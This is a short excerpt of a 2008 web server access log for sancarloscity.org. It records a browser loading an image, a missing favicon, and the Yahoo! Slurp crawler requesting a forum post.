121.1.44.244 - - [28/Aug/2008:06:18:40 -0700] "GET /quisumbingsite/qbanner2.jpg HTTP/1.1" 200 37507 "http://www.sancarloscity.org/quisumbingsite/emiliostory4.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
121.1.44.244 - - [28/Aug/2008:06:18:45 -0700] "GET /favicon.ico HTTP/1.1" 404 747 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:19:46 -0700] "GET /forum2/index.php?act=findpost&pid=787 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
